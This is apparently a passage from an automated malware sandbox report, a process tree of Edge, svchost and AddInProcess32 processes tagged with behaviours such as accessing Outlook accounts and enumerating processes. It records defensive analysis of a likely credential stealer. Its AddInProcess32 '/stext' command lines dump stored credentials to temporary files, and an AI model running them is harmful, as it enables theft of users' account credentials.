        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5944 /prefetch:1
        7⤵
        
        PID:5996
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:1
        7⤵
        
        PID:5288
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:1
        7⤵
        
        PID:1680
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2256 /prefetch:1
        7⤵
        
        PID:1392
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1
        7⤵
        
        PID:5312
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:1
        7⤵
        
        PID:916
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:1
        7⤵
        
        PID:5984
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6200 /prefetch:1
        7⤵
        
        PID:6108
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:1
        7⤵
        
        PID:2732
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:1
        7⤵
        
        PID:5396
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6064 /prefetch:1
        7⤵
        
        PID:5632
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6512 /prefetch:1
        7⤵
        
        PID:1440
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1
        7⤵
        
        PID:3996
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7060 /prefetch:1
        7⤵
        
        PID:1192
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7120 /prefetch:1
        7⤵
        
        PID:1208
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6736 /prefetch:1
        7⤵
        
        PID:3100
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7196 /prefetch:1
        7⤵
        
        PID:4364
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6692 /prefetch:1
        7⤵
        
        PID:1696
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7388 /prefetch:1
        7⤵
        
        PID:6120
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7532 /prefetch:1
        7⤵
        
        PID:5320
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7604 /prefetch:1
        7⤵
        
        PID:6156
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7136 /prefetch:2
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6588
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7772 /prefetch:1
        7⤵
        
        PID:6804
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7764 /prefetch:1
        7⤵
        
        PID:6828
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8096 /prefetch:1
        7⤵
        
        PID:2348
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,5413295820565297220,13332344072133409656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8120 /prefetch:1
        7⤵
        
        PID:5148
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:5304
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeaae446f8,0x7ffeaae44708,0x7ffeaae44718
        7⤵
        
        PID:5324
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\ziezeegugi"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3088
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\klkseprouqauv"
        5⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:1420
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\mfpkfhcqizshgags"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4340
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5332
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:5796
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x9c,0x108,0x7ffeaae446f8,0x7ffeaae44708,0x7ffeaae44718
        7⤵
        
        PID:5808
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:5636
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeaae446f8,0x7ffeaae44708,0x7ffeaae44718
        7⤵
        
        PID:3300
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5136
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:5988
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeaae446f8,0x7ffeaae44708,0x7ffeaae44718
        7⤵
        
        PID:6128
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:1360
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeaae446f8,0x7ffeaae44708,0x7ffeaae44718
        7⤵
        
        PID:2356
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4136
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:684
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeaae446f8,0x7ffeaae44708,0x7ffeaae44718
        7⤵
        
        PID:1372
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:5876
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeaae446f8,0x7ffeaae44708,0x7ffeaae44718
        7⤵
        
        PID:3340
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3836
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:1840
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeaae446f8,0x7ffeaae44708,0x7ffeaae44718
        7⤵
        
        PID:5096
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:3244
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeaae446f8,0x7ffeaae44708,0x7ffeaae44718
        7⤵
        
        PID:5188
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:720
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:2712
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeaae446f8,0x7ffeaae44708,0x7ffeaae44718
        7⤵
        
        PID:4344
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:6024
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeaae446f8,0x7ffeaae44708,0x7ffeaae44718
        7⤵
        
        PID:4668
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:688
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:1640
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
